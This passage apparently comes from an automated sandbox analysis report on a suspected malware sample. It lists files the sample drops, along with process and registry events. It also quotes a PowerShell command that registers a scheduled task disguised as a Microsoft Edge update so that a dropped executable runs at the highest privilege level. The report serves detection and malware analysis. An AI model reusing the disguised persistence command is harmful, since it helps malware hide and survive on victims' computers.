Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\select.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\wdsutil.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_x25519.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\SetupCore.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\libssl-1_1.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80722\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\wdsimage.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73322\python38.dllJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\pidgenx.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80722\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Math\_modexp.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_ghash_clmul.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73322\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\DU.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73322\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\MediaSetupUIMgr.dllJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73322\libssl-1_1.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80722\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\DiagTrackRunner.exeJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\libffi-7.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73322\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73322\libcrypto-1_1.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\Diager.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$Windows.~WS\Sources\Panther\setuperr.log
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$Windows.~WS\Sources\Panther\setupact.log
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$WINDOWS.~BT\Sources\Panther\setuperr.log
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$WINDOWS.~BT\Sources\Panther\setupact.log
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$Windows.~WS\Sources\Panther\Eula.rtf

Boot Survival

barindex
Uses Register-ScheduledTask to add task schedules
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../LineInst.exe'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnce' -Description 'MicrosoftEdgeUpdatesOnce once' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' "
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67355D0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF7A67355D0
Source: C:\$Windows.~WS\Sources\SetupHost.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\$Windows.~WS\Sources\SetupHost.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\WinHex.exeKey value created or modified: HKEY_CURRENT_USER\Console\1 d33f351a4aeea5e608853d1a56661059
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
